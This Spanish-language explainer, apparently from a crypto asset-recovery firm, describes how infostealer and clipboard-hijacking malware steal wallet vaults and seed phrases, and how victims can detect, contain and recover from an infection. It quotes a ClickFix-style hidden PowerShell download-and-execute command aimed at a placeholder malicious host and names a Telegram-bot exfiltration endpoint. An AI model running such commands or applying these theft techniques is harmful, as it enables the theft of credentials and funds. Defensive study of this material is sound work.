Malware infostealer de criptomonedas: cómo los troyanos atacan claves privadas de billeteras, extensiones de navegador y datos del portapapeles — detección, desinfección y recuperación de víctimas
El malware de robo de información (infostealer) se ha consolidado como uno de los vectores de amenaza más prolíficos y devastadores a los que se enfrentan los inversores en criptomonedas, los participantes en finanzas descentralizadas (DeFi) y los custodios institucionales de activos digitales. A diferencia del ransomware convencional, que cifra de manera evidente los sistemas de archivos para exigir rescates mediante extorsión, los infostealers modernos operan en un silencio casi absoluto. Estas cargas útiles troyanizadas y armamentizadas vulneran las defensas del endpoint, escanean sistemáticamente el almacenamiento en disco local y la memoria del sistema, extraen las bóvedas cifradas de extensiones de navegador, recopilan frases semilla criptográficas e interceptan los destinos de las transacciones en tiempo real. Para aquellas víctimas que se despiertan con sus saldos completamente vaciados en MetaMask, Phantom, Coinbase Wallet o aplicaciones de escritorio, comprender cómo se producen estas intrusiones es el primer paso crítico para detener la explotación activa, sanear la infraestructura técnica y emprender acciones forenses decisivas a fin de rastrear y recuperar el capital sustraído.
1. Comprensión del malware infostealer de criptomonedas: la mecánica del robo de información
El malware infostealer de criptomonedas representa una categoría especializada de software troyano diseñada específicamente para descubrir, recolectar y exfiltrar secretos de autenticación, credenciales confidenciales y material criptográfico desde sistemas operativos comprometidos. Mientras que el malware tradicional se enfocaba históricamente en botnets de denegación de servicio distribuido (DDoS) o en el cifrado disruptivo de archivos, la economía del cibercrimen moderno prioriza la extracción silenciosa de activos. Una vez que la carga útil de un infostealer se ejecuta en un endpoint, cumple su misión maliciosa en cuestión de segundos, finalizándose a menudo a sí mismo o permaneciendo inactivo antes de que las soluciones de seguridad del host puedan alertar sobre actividades anómalas.
La comercialización de esta amenaza ha sido impulsada por el modelo de distribución de malware como servicio (Malware-as-a-Service o MaaS). En foros de la darknet y canales ilícitos de Telegram, sindicatos especializados de desarrolladores alquilan binarios compilados, paneles de administración web y herramientas automatizadas de compilación a afiliados con escasas habilidades técnicas, mediante esquemas de suscripción mensual o reparto de ingresos. Familias reconocidas de malware como RedLine Stealer, META, Vidar, Raccoon Stealer y Lumma Stealer han establecido cadenas de suministro sumamente sofisticadas. Como señalan los investigadores de ciberseguridad de SentinelOne, los operadores de infostealers despliegan estrategias de distribución sumamente dirigidas, tales como campañas de ClickFix, aprovechando la ingeniería social psicológica y la fatiga de verificación para forzar la ejecución de ejecutores de scripts que descargan silenciosamente binarios maliciosos desde infraestructura externa de comando y control (C2).
La magnitud global de este ecosistema quedó demostrada a través de importantes acciones coordinadas de las fuerzas del orden internacionales. A finales de 2024, Eurojust coordinó la Operation Magnus, una coalición multinacional integrada por autoridades de los Países Bajos, Estados Unidos, Bélgica, Portugal, el Reino Unido y Australia que desmanteló con éxito la infraestructura central de servidores que respaldaba a los infostealers RedLine y META. Los registros forenses incautados durante la operación revelaron que únicamente estas dos variantes habían comprometido millones de sistemas individuales en todo el mundo, recolectando miles de millones de credenciales, historiales de navegación y perfiles de billeteras de criptomonedas.
Conclusión técnica: el ciclo de vida operativo del infostealer
Velocidad de ejecución: Los stealers modernos como Lumma y Vidar ejecutan la recolección de datos, el empaquetado de archivos y la exfiltración por red en menos de 45 segundos tras la inyección del proceso.
Activos atacados: Las cargas útiles localizan automáticamente las claves maestras de cifrado de Chromium, descifran los almacenes LevelDB de las extensiones, sustraen archivos de configuración de billeteras de escritorio y rastrean directorios de usuario en busca de patrones mnemónicos.
Monetización automatizada: Los archivos exfiltrados ("logs") son procesados por scripts automáticos de análisis sintáctico que clasifican credenciales y enrutan de inmediato las frases semilla de criptomonedas hacia bots automatizados de drenaje.
De acuerdo con el Chainalysis 2026 Crypto Crime Report, los fondos robados derivados de brechas por malware y vulneraciones de endpoints representan cientos de millones de dólares en pérdidas anuales on-chain. En lugar de inspeccionar manualmente los registros sustraídos, las redes de amenazas actuales implementan analizadores automáticos de logs que ingieren archivos comprimidos exfiltrados a través de solicitudes HTTP POST cifradas o APIs de bots de Telegram. Cuando se reconocen claves privadas o frases semilla válidas, contratos inteligentes de drenaje automatizado y bots de transacciones barren de inmediato todos los saldos asociados, canalizando los activos digitales hacia rutas de lavado multisalto en cuestión de minutos tras la infección inicial.
2. Cómo los stealers extraen claves privadas, bóvedas de extensiones de navegador y frases semilla
Las extensiones de navegador Web3 sin custodia como MetaMask, Phantom, Coinbase Wallet, Rabby y TronLink dependen de las APIs de almacenamiento estándar del navegador. Tanto en navegadores basados en Chromium (Google Chrome, Brave, Microsoft Edge, Opera) como en navegadores basados en Gecko (Mozilla Firefox), el estado de las extensiones se escribe en directorios del disco local formateados como bases de datos LevelDB o SQLite.
El mecanismo de descifrado mediante DPAPI de Windows
Los navegadores Chromium cifran los datos confidenciales almacenados utilizando una clave maestra cifrada ubicada en el archivo de configuración JSON "Local State" del navegador. En Windows, esta clave maestra está protegida a través de la función CryptProtectData de la Data Protection API (DPAPI) de Windows. DPAPI protege los secretos frente a otras cuentas de usuario del equipo, pero cualquier ejecutable que se ejecute en el contexto del usuario con sesión iniciada puede invocar CryptUnprotectData para descifrar la clave maestra sin activar avisos administrativos de Control de cuentas de usuario (UAC).
Tal como se documenta en los análisis de amenazas de Huntress Threat Library, infostealers como Lumma Stealer localizan el directorio Local State, ejecutan CryptUnprotectData contra la clave maestra cifrada y obtienen la clave simétrica AES pura en memoria. Provisto de esta clave, el malware consulta los directorios de extensiones en busca de identificadores estáticos codificados, como MetaMask (nkbihfbeogaeaoehlefnkodbefgpgknn) o Phantom (bfnaelmomeimhlpmgjnjophhpkkoljpa). El malware copia la base de datos LevelDB completa que contiene la bóveda cifrada de la billetera, el valor de sal (salt) y el hash de la contraseña.
Conclusión clave: fuerza bruta offline sobre las bóvedas de navegadores
Exfiltración de bóvedas: Los stealers no intentan adivinar las contraseñas de las billeteras en su endpoint. Transmiten las bases de datos LevelDB cifradas a servidores externos donde clústeres distribuidos de GPU ejecutan ataques de diccionario y de fuerza bruta a una velocidad de miles de millones de hashes por segundo.
Vulnerabilidad en la longitud de contraseñas: Las contraseñas débiles de 8 caracteres o combinaciones alfanuméricas comunes de extensiones pueden descifrarse a los pocos minutos de la exfiltración.
Objetivo en archivos de clientes de escritorio y mnemónicos sin cifrar
Los infostealers también apuntan a aplicaciones cliente de escritorio independientes para billeteras de criptomonedas. La telemetría de amenazas de SlowMist Technology y el U.S. Department of Justice (DOJ) revela que las cargas útiles de malware consultan sistemáticamente las rutas de archivo predeterminadas de aplicaciones como Electrum (%APPDATA%\Electrum\wallets), Exodus (%APPDATA%\Exodus\exodus.wallet), Atomic Wallet y Wasabi Wallet.
Los stealers también incorporan módulos de rastreo de archivos que escanean las carpetas Escritorio, Documentos y Descargas en busca de formatos de texto y documentos (.txt, .docx, .pdf, .kdbx). Las cargas útiles utilizan expresiones regulares para detectar frases semilla mnemónicas del estándar BIP-39 (de 12, 18 o 24 palabras estándar), claves privadas sin procesar de 64 caracteres y claves API de exchanges. Asimismo, muchas variantes capturan capturas de pantalla del escritorio en el momento de la ejecución para recolectar notas o credenciales visibles en pantalla.
3. Secuestradores de portapapeles y malware clipper: la amenaza silenciosa de sustitución de direcciones
Los secuestradores de portapapeles, o malware clipper, manipulan el búfer del portapapeles del sistema operativo en tiempo real. Dado que las direcciones públicas criptográficas son cadenas alfanuméricas largas, los usuarios de criptomonedas acostumbran copiar y pegar sistemáticamente las direcciones de destino al iniciar transferencias. El malware clipper subvierte este flujo de trabajo sustituyendo silenciosamente la dirección del destinatario legítimo por una dirección controlada por el atacante.
Monitoreo de APIs y coincidencia mediante expresiones regulares
El malware clipper monitorea el búfer del portapapeles utilizando funciones de la API de Windows como GetClipboardData y SetClipboardData. Cada vez que se copia texto, el malware evalúa la cadena mediante expresiones regulares optimizadas que reconocen los formatos de dirección de las principales criptomonedas:
- Bitcoin (BTC): Formatos de dirección Legacy P2PKH ("1"), P2SH ("3"), SegWit Bech32 ("bc1q") y Taproot ("bc1p").
- Ethereum y cadenas EVM (ETH, BNB, MATIC): Cadenas hexadecimales de 40 caracteres con el prefijo "0x".
- Solana (SOL): Cadenas codificadas en Base58 de entre 32 y 44 caracteres alfanuméricos.
- TRON (TRX / USDT-TRC20): Cadenas de 34 caracteres que comienzan con "T".
Cuando se detecta el patrón de una dirección, el clipper reemplaza inmediatamente el búfer con una dirección en la misma red blockchain perteneciente al atacante en cuestión de milisegundos, haciendo que la sustitución resulte imperceptible durante los flujos habituales de copiar y pegar.
Evasión mediante direcciones vanity y vulneración de billeteras de hardware
Investigaciones académicas en arXiv que detallan el ataque "EthClipper" demuestran cómo los adversarios pregeneran millones de direcciones personalizadas (vanity addresses) que coinciden con los 4 a 6 primeros y los 4 a 6 últimos caracteres de las direcciones de las víctimas. Dado que el hábito visual humano suele verificar únicamente el prefijo y el sufijo de una dirección, las víctimas aprueban con frecuencia transacciones hacia direcciones similares controladas por atacantes.
Riesgo crítico: las billeteras de hardware no son inmunes a los clippers
Integridad del equipo anfitrión: Una billetera de hardware protege las claves privadas frente a su extracción, pero no puede evitar que el usuario firme una transacción dirigida a una dirección de destinatario incorrecta.
Verificación en pantalla física: Si un clipper sustituye la dirección en su ordenador, la billetera de hardware mostrará la dirección suplantada en su pantalla física. Si no se inspeccionan minuciosamente todos los caracteres en la pantalla del dispositivo de hardware, los clippers basados en direcciones vanity logran su cometido.
Los datos documentados por SlowMist Technology demuestran que los módulos clipper se integran directamente dentro de paquetes de infostealers o se distribuyen mediante utilidades Web3 troyanizadas. Al requerir una cantidad mínima de código, mantienen una huella de memoria excepcionalmente reducida y eluden las firmas estáticas de antivirus, permaneciendo activos en los endpoints durante meses.
4. Vectores de distribución de los ciberdelincuentes: malvertising, software pirata y señuelos de phishing
Los sindicatos modernos de infostealers operan redes de distribución multicanal diseñadas para engañar a los objetivos y lograr que ejecuten código malicioso. Inversores de criptomonedas, ingenieros de Web3 y operadores de activos digitales son atacados a través de la manipulación de motores de búsqueda, ingeniería social y cadenas de suministro digitales comprometidas.
Campañas de malvertising en motores de búsqueda
Un vector preponderante es la suplantación de identidad mediante anuncios en motores de búsqueda. El Internet Crime Complaint Center (IC3) del Federal Bureau of Investigation (FBI) emitió un aviso de servicio público detallando cómo los ciberdelincuentes adquieren anuncios de búsqueda patrocinados en Google Ads y Bing Ads. Los actores de amenazas pujan por términos de búsqueda de alta intención comercial, como "download metamask", "phantom wallet extension", "tradingview desktop" o "exodus wallet download".
Cuando un usuario realiza una búsqueda, el anuncio fraudulento patrocinado aparece por encima de los resultados orgánicos. Al hacer clic, la víctima es redirigida mediante filtros de encubrimiento (cloaking) que muestran contenido inofensivo a los rastreadores web mientras presentan a los usuarios un clon idéntico del proyecto legítimo. Al descargar el instalador, se ejecuta un dropper ofuscado que contiene RedLine, Vidar o Lumma Stealer.
La técnica de ataque de verificación ClickFix
Las investigaciones de seguridad de SentinelOne y Qualys Threat Research destacan la proliferación del ataque de ingeniería social denominado "ClickFix". En estos ataques, sitios web maliciosos muestran errores simulados, como desafíos falsos de CAPTCHA de Cloudflare, advertencias de códecs de video faltantes o alertas simuladas de actualización del navegador.
Se instruye al usuario a presionar la tecla Windows + R, pegar una cadena copiada en el cuadro de diálogo Ejecutar y presionar Enter. En realidad, la carga útil copiada en el portapapeles contiene un comando de PowerShell ofuscado (como powershell -w hidden -c "iex(New-Object Net.WebClient).DownloadString('https://malicious-cdn...')"). Dado que es el propio usuario quien ejecuta manualmente el comando, las soluciones de protección de endpoint suelen considerarlo una actividad administrativa legítima, eludiendo cortafuegos perimetrales.
Desglose de vectores de distribución: principales fuentes de infección
Anuncios en motores de búsqueda: Anuncios suplantados en las primeras posiciones que imitan software de billeteras de hardware, extensiones Web3 y terminales de trading.
Señuelos interactivos de CAPTCHA: Indicaciones de ClickFix que inducen a los usuarios a ejecutar scripts de PowerShell codificados en base64 en la consola Ejecutar de Windows.
Señuelos de empleo y para desarrolladores: Falsas ofertas de trabajo en Telegram, Discord y LinkedIn que exigen a los desarrolladores evaluar repositorios de código que contienen dependencias maliciosas de npm.
Portales de soporte técnico suplantados y captación directa fraudulenta
En una alerta posterior, el FBI IC3 alertó sobre el incremento de portales falsos de soporte técnico y el acercamiento engañoso a desarrolladores. En comunidades de desarrolladores de criptomonedas, los actores de amenazas se hacen pasar por reclutadores o fundadores de startups de Web3 para invitar a los candidatos a resolver pruebas técnicas de programación. Los repositorios suministrados contienen dependencias armamentizadas que ejecutan la carga útil de un infostealer en el preciso instante en que se ejecuta npm install.
5. Señales de advertencia: cómo identificar una infección activa de infostealer en su dispositivo
Los infostealers están diseñados para operar de forma encubierta; sin embargo, su ejecución genera artefactos forenses distintivos y anomalías de comportamiento. Detectar una infección activa antes de que los atacantes completen la monetización de los datos exfiltrados puede evitar la pérdida total de los activos.
Indicadores de comportamiento en el endpoint
Debido a que los infostealers interactúan directamente con los almacenes de archivos locales y los procesos del navegador, las víctimas experimentan con frecuencia interrupciones abruptas. Los estudios de Huntress Threat Library y Qualys identifican varios indicadores clave en el endpoint:
- Cierres inesperados del navegador y reinicios de perfil: Los stealers fuerzan la detención de los procesos activos del navegador (como
chrome.exeobrave.exe) para liberar los bloqueos sobre los archivos de base de datos SQLite y LevelDB. - Ventanas de consola intermitentes: Ventanas breves de línea de comandos o consolas PowerShell que parpadean durante una fracción de segundo durante el arranque del sistema o tras pulsar en un enlace web.
- Manipulación de herramientas antimalware: Inclusiones no autorizadas en la ruta de registro de exclusiones de Windows Defender (
HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths). - Procesos inusuales en segundo plano: Ejecutables con nombres aleatorios que operan desde directorios temporales como
%APPDATA%oC:\Users\Public\consumiendo ciclos de CPU de forma errática.
Anomalías en el tráfico de red y comunicaciones
La telemetría publicada por Darktrace Threat Insights pone de manifiesto patrones de red asociados a la exfiltración de infostealers. Tras recopilar los archivos locales, el malware empaqueta contraseñas, cookies y claves de billeteras en archivos cifrados, iniciando solicitudes HTTP POST salientes hacia servidores C2 remotos o utilizando canales de la API de bots de Telegram (como solicitudes dirigidas a api.telegram.org/bot[token]/sendDocument).
Señales de advertencia conductuales on-chain
Transferencias para financiar comisiones de gas: Los actores de amenazas depositan pequeñas sumas de tokens nativos para gas (ETH, SOL o TRX) en su billetera desde direcciones intermediarias desconocidas para habilitar el gas necesario con el fin de transferir saldos mayores de stablecoins.
Barridos automatizados de saldos: Vaciado repentino de los saldos de la billetera sin que se hayan generado solicitudes de firma en la extensión de su navegador.
Enrutamiento multisalto: La inteligencia blockchain de TRM Labs demuestra que las transacciones de drenaje de stealers se canalizan en cuestión de segundos a través de exchanges descentralizados o puentes cross-chain.
6. Contención de emergencia: aislar sistemas comprometidos y proteger activos digitales
Si sospecha que un infostealer se ha ejecutado en su ordenador o detecta transacciones no autorizadas, la contención inmediata es crítica. El pánico suele llevar a las víctimas a ejecutar análisis prolongados de antivirus en el equipo infectado, lo que permite que la exfiltración en curso concluya o que se activen rutinas de borrado destructivo (wiper).
Paso 1: Cortar toda la conectividad de red de inmediato
El aislamiento total de la red es la primera medida obligatoria. Desconecte físicamente los cables Ethernet, desactive las interfaces Wi-Fi y Bluetooth, o active el modo avión por hardware. Interrumpir la conexión a internet corta los sockets activos con los servidores C2, detiene la exfiltración pendiente e impide la ejecución remota de comandos. No reinicie el equipo de inmediato, ya que la memoria RAM volátil contiene datos forenses de gran valor.
Paso 2: Migrar a un entorno limpio y aislado
Nunca intente rescatar activos de criptomonedas desde el dispositivo infectado. Cualquier pulsación de tecla o frase semilla introducida en un sistema comprometido puede ser interceptada por keyloggers activos. Como destacan las alertas conjuntas de ciberseguridad del FBI IC3, toda la respuesta al incidente debe realizarse desde un dispositivo comprobadamente limpio:
- Utilice un ordenador secundario limpio o un smartphone recién configurado conectado mediante datos móviles (no conectado a la red Wi-Fi local comprometida).
- Configure una billetera de hardware completamente nueva o una billetera de software nueva generada con una frase de recuperación totalmente inédita.
- Nunca importe una frase de recuperación comprometida: Jamás importe la frase semilla existente en un dispositivo nuevo. Una vez que una frase semilla ha sido sustraída, todas las direcciones públicas derivadas en cualquier red blockchain quedan permanentemente inseguras.
Triaje operativo: jerarquía de evacuación de activos
Prioridad 1: Tokens líquidos transferibles: Transfiera de inmediato los tokens líquidos de alto valor (Bitcoin, Ethereum, Solana, USDT, USDC) hacia la dirección de almacenamiento en frío (cold storage) segura que acaba de generar.
Prioridad 2: Posiciones en staking y bloqueadas: Revise los protocolos de finanzas descentralizadas en los que mantenga colaterales bloqueados. Si los periodos de unstaking lo permiten, inicie retiros hacia direcciones limpias o revoque las asignaciones de contratos para bloquear los permisos de drenadores.
Prioridad 3: Cuentas en exchanges centralizados: Inicie sesión desde su dispositivo limpio en los exchanges centralizados (Binance, Coinbase, Kraken). Cierre todas las sesiones activas, restablezca las contraseñas, rote las semillas de autenticación en dos pasos (2FA) y desactive las claves API habilitadas.
Paso 3: Revocar aprobaciones activas y tokens de sesión
Si con anterioridad otorgó permisos a contratos inteligentes desde la billetera afectada, utilice herramientas de gestión de aprobaciones como Revoke.cash o las interfaces de aprobación oficiales de los exploradores de bloques desde su dispositivo limpio. Aunque revocar las aprobaciones no impedirá que un atacante en posesión de las claves privadas transfiera monedas nativas, sí bloqueará que contratos automáticos de drenaje vacíen los saldos de tokens con permisos previamente concedidos.
7. Desinfección integral del dispositivo y reconstrucción de un entorno seguro
Un error habitual de las víctimas de malware consiste en confiar en que un software antivirus comercial "limpie" el sistema infectado. Si bien un escáner de endpoint puede detectar el ejecutable dropper inicial, los infostealers inyectan código malicioso (shellcode) en procesos legítimos del sistema, alteran configuraciones de arranque, crean tareas programadas e instalan herramientas secundarias de acceso remoto o malware clipper persistente en directorios del sistema.
La imperiosa necesidad de reinstalar el sistema operativo desde cero (bare-metal)
Como se documenta en los informes forenses tras las actuaciones judiciales del Department of Justice contra organizaciones de infostealers, estas cargas útiles suelen arraigar mecanismos de persistencia profunda. Los análisis de amenazas de Darktrace ratifican que los stealers avanzados sobreviven a simples puntos de restauración del sistema. Restablecer la integridad del entorno informático exige una reinstalación completa desde cero (bare-metal):
- Crear los medios de instalación en un equipo limpio: Prepare una unidad USB de arranque utilizando la herramienta oficial Media Creation Tool de Microsoft o una distribución oficial de Linux desde un ordenador verificado y no comprometido.
- Ejecutar una repartición y formateo exhaustivo del disco: Elimine todas las particiones de disco existentes y realice un formateo completo. Evite opciones de "restablecimiento suave" o "conservar mis archivos", ya que los binarios maliciosos pueden ocultarse dentro de los directorios de datos de usuario preservados.
- Actualizar el firmware UEFI/BIOS de la placa base: Actualice al firmware más reciente descargado directamente desde el portal oficial del fabricante para mitigar posibles mecanismos de persistencia a nivel de firmware.
Invalidación de credenciales y destrucción de sesiones
Dado que los infostealers recolectan cookies de sesión activas del navegador, los actores de amenazas pueden burlar la autenticación multifactor (MFA) mediante el secuestro de sesiones. Reinstalar el sistema operativo no invalida las cookies que ya han sido transmitidas a los servidores C2. Desde un dispositivo secundario seguro, cierre manualmente todas las sesiones activas en sus proveedores de correo electrónico, gestores de contraseñas, plataformas en la nube y exchanges de criptomonedas seleccionando "Cerrar sesión en todos los demás dispositivos".
Protocolo de securización: arquitectura futura de endpoints
Endpoints dedicados para transacciones: Los usuarios activos de Web3 deben segmentar sus actividades manteniendo un ordenador portátil dedicado y protegido exclusivamente para firmar transacciones en blockchain.
Verificación física en billeteras de hardware: Mitigue los riesgos del portapapeles del host identificados en la investigación académica sobre EthClipper verificando cada carácter de las direcciones de destino en la pantalla física de la billetera de hardware antes de transmitir cualquier transacción.
8. Triaje de activos robados: rastreo en blockchain, denuncia ante las fuerzas del orden y recursos legales
Una vez completada la contención del endpoint y el restablecimiento de credenciales, la respuesta de la víctima pasa al triaje de activos y la recuperación forense. La naturaleza descentralizada de las blockchains públicas implica que los administradores de los protocolos no pueden revertir transacciones. Sin embargo, la arquitectura de libro contable transparente de Bitcoin, Ethereum, Solana y otras redes proporciona un registro de auditoría indeleble que los investigadores forenses y los organismos encargados de hacer cumplir la ley utilizan para rastrear los fondos robados.
Preservación de evidencia forense
Antes de ponerse en contacto con investigadores o presentar denuncias oficiales, recopile un expediente documentado del incidente. Registre cada hash de transacción (TXID) vinculado a la retirada no autorizada, marcas de tiempo de ejecución, redes blockchain, direcciones de destinatario del atacante y direcciones de contratos de los tokens. Exporte los metadatos brutos en JSON de las transacciones desde exploradores de bloques como Etherscan, Solscan o Tronscan. En caso de haber mantenido comunicación con un falso reclutador o interactuado con un sitio web malicioso, archive las cadenas de URL completas, IPs de alojamiento y transcripciones de conversaciones.
Rastreo on-chain y análisis multisalto
Los actores de amenazas no conservan las criptomonedas sustraídas en las billeteras de recolección inicial. Investigaciones de TRM Labs y Chainalysis demuestran que las redes criminales recurren a scripts automatizados de blanqueo que dispersan rápidamente los fondos entre decenas de direcciones intermedias. Los activos son dirigidos a través de fondos de liquidez descentralizados, transferidos mediante puentes cross-chain o pasados por protocolos de mezcla de monedas (coin-mixing).
Las firmas profesionales de inteligencia blockchain emplean motores de análisis gráfico para seguir el rastro del dinero a través de complejas topologías de lavado. Dado que los atacantes necesitan tarde o temprano liquidez en dinero fiduciario (fiat), los fondos robados terminan fluyendo hacia proveedores de servicios de activos virtuales (VASP) centralizados o intermediarios extrabursátiles (OTC). Cuando el rastreo on-chain identifica que los depósitos ingresan a un exchange regulado, los investigadores facilitan la rápida intervención de las fuerzas de seguridad para solicitar a los equipos de cumplimiento de los exchanges la congelación de emergencia de las cuentas antes de que se produzca la retirada hacia fiat (off-ramping).
Recursos legales y canales de denuncia ante las fuerzas del orden
Denuncia ante el FBI IC3: Las víctimas en los Estados Unidos deben presentar de inmediato una denuncia pormenorizada en ic3.gov, clasificando el incidente bajo intrusión cibernética y robo de moneda virtual, adjuntando todos los hashes de transacción y direcciones de billetera del atacante.
Autoridades internacionales: Las víctimas en Europa deben radicar la denuncia ante las unidades policiales especializadas en ciberdelincuencia de su país y hacer referencia a los marcos de la Operation Magnus coordinados por Eurojust y Europol.
Órdenes judiciales de congelación: En supuestos con pérdidas económicas cuantiosas, letrados especializados en recuperación de activos digitales pueden obtener medidas cautelares judiciales de divulgación ex parte (como órdenes Norwich Pharmacal o Bankers Trust en jurisdicciones de derecho anglosajón / common law) para exigir a los exchanges la congelación cautelar de los activos sustraídos y la aportación de registros de identificación de clientes (KYC).
¿Sospecha que su billetera de criptomonedas ha sido comprometida por un infostealer?
Recoveris es una firma de inteligencia blockchain y recuperación de activos digitales con sede en Zug, Suiza. Si sus claves privadas, frases semilla o bóvedas de extensiones de navegador han sido sustraídas por malware, nuestro equipo forense puede evaluar su caso, rastrear los flujos de fondos on-chain y coordinar con autoridades y exchanges para congelar los activos robados.
Actúe rápidamente: la ventana para bloqueos de emergencia en exchanges es crítica antes de que los fondos robados sean liquidados.
Contactar a Recoveris para una evaluación de incidenteEvalúe su preparación para la recuperación
¿Qué tan preparado está para responder a una intrusión de malware en sus dispositivos o a una billetera comprometida? Complete nuestra evaluación diagnóstica estructurada para evaluar su capacidad de respuesta ante incidentes y el potencial de recuperación.
Iniciar evaluación de recuperación3-5 minutos • 10 preguntas • Resumen personalizado instantáneo
Referencias
- 1.Chainalysis. (2026). The 2026 Crypto Crime Report & Stolen Funds Ecosystem. Disponible en: https://www.chainalysis.com/reports/crypto-crime-2026/
- 2.TRM Labs. (2026). Cross-Chain Tracing and Multi-Hop Obfuscation in Cybercrime Investigations. Disponible en: https://www.trmlabs.com/glossary/cross-chain-tracing
- 3.FBI Internet Crime Complaint Center (IC3). (2022). Cybercriminals Use Search Engine Advertisement Services to Impersonate Legitimate Brands and Deliver Malware. Disponible en: https://www.ic3.gov/PSA/2022/PSA221221
- 4.Eurojust. (2024). Malware Targeting Millions of People Taken Down by International Coalition (Operation Magnus). Disponible en: https://www.eurojust.europa.eu/news/malware-targeting-millions-people-taken-down-international-coalition
- 5.U.S. Department of Justice (DOJ). (2024). U.S. Joins International Action Against RedLine and META Infostealers. Disponible en: https://www.justice.gov/usao-wdtx/pr/us-joins-international-action-against-redline-and-meta-infostealers
- 6.Investigación académica (arXiv). (2021). EthClipper: A Clipboard Meddling Attack on Hardware Wallets with Address Verification Evasion. Disponible en: https://arxiv.org/abs/2108.14004
- 7.FBI Internet Crime Complaint Center (IC3). (2025). Public Service Announcement on Spoofed Tech Portals and Fraudulent Support Entities. Disponible en: https://www.ic3.gov/PSA/2025/PSA250919
- 8.SentinelOne. (2025). How ClickFix is Weaponizing Verification Fatigue to Deliver RATs and Infostealers. Disponible en: https://www.sentinelone.com/blog/how-clickfix-is-weaponizing-verification-fatigue-to-deliver-rats-infostealers/
- 9.Qualys Threat Research. (2024). Unmasking Lumma Stealer: Analyzing Deceptive Tactics with Fake CAPTCHA. Disponible en: https://blog.qualys.com/vulnerabilities-threat-research/2024/10/20/unmasking-lumma-stealer-analyzing-deceptive-tactics-with-fake-captcha
- 10.Huntress Threat Library. (2025). Lumma Stealer Behavioral Profile, Persistence, and Data Exfiltration. Disponible en: https://www.huntress.com/threat-library/malware/lumma-stealer
- 11.Darktrace Threat Insights. (2025). The Rise of the Lumma Info Stealer and Wallet Harvesting Campaigns. Disponible en: https://www.darktrace.com/blog/the-rise-of-the-lumma-info-stealer
- 12.SlowMist Technology. (2026). Web3 Wallet Attack Vectors and Malicious Extension Exploits. Disponible en: https://hacked.slowmist.io/?c=Wallet&page=1
Preguntas frecuentes
¿Puede un infostealer robar fondos de una billetera de hardware como Ledger o Trezor?
Los infostealers no pueden extraer claves privadas almacenadas de forma segura dentro del elemento seguro de una billetera de hardware. No obstante, los secuestradores de portapapeles pueden sustituir silenciosamente las direcciones de destino durante la firma de transacciones, y las solicitudes falsas de actualización de software o firmware pueden engañar a los usuarios para que introduzcan sus semillas de recuperación directamente a través del teclado.
Si mi antivirus eliminó un troyano stealer, ¿es seguro usar mi billetera de criptomonedas?
No. Los infostealers suelen completar la exfiltración de datos en cuestión de segundos tras su ejecución, transmitiendo las bóvedas de extensiones de navegador y las claves almacenadas a servidores de comando y control antes de que las heurísticas de los antivirus tradicionales se activen. Una vez que un dispositivo ha ejecutado un stealer, todas las billeteras calientes (hot wallets) alojadas en él deben considerarse permanentemente comprometidas.
¿Cómo logran los secuestradores de portapapeles eludir la verificación visual de direcciones?
Los clippers de portapapeles avanzados generan millones de direcciones personalizadas (vanity addresses) de criptomonedas que coinciden con los 4 a 6 primeros y los 4 a 6 últimos caracteres de los formatos de destino más habituales. Cuando los usuarios inspeccionan únicamente el inicio y el final de una dirección pegada, confirman inadvertidamente transacciones hacia billeteras controladas por los atacantes.
¿Se pueden recuperar las criptomonedas robadas por operadores de infostealers?
Si bien las transferencias en blockchains descentralizadas no pueden revertirse, los fondos pueden rastrearse forensemente a través de múltiples saltos y puentes cross-chain. Cuando los activos robados alcanzan exchanges centralizados o rampas de salida reguladas, los bloqueos judiciales de emergencia y la coordinación con las fuerzas de seguridad pueden asegurar los saldos para su recuperación.
¿Puede un infostealer infectar dispositivos macOS o Linux, o solo afecta a PC con Windows?
Aunque Windows representa el objetivo principal debido a su amplia cuota de mercado en ordenadores de escritorio y a las implementaciones de almacenamiento de DPAPI, las organizaciones cibercriminales despliegan activamente stealers multiplataforma desarrollados en Go y Rust, así como variantes específicas para macOS como Atomic macOS Stealer (AMOS), que recolectan credenciales del Llavero de Apple (Keychain) y bóvedas de extensiones de billeteras en el navegador.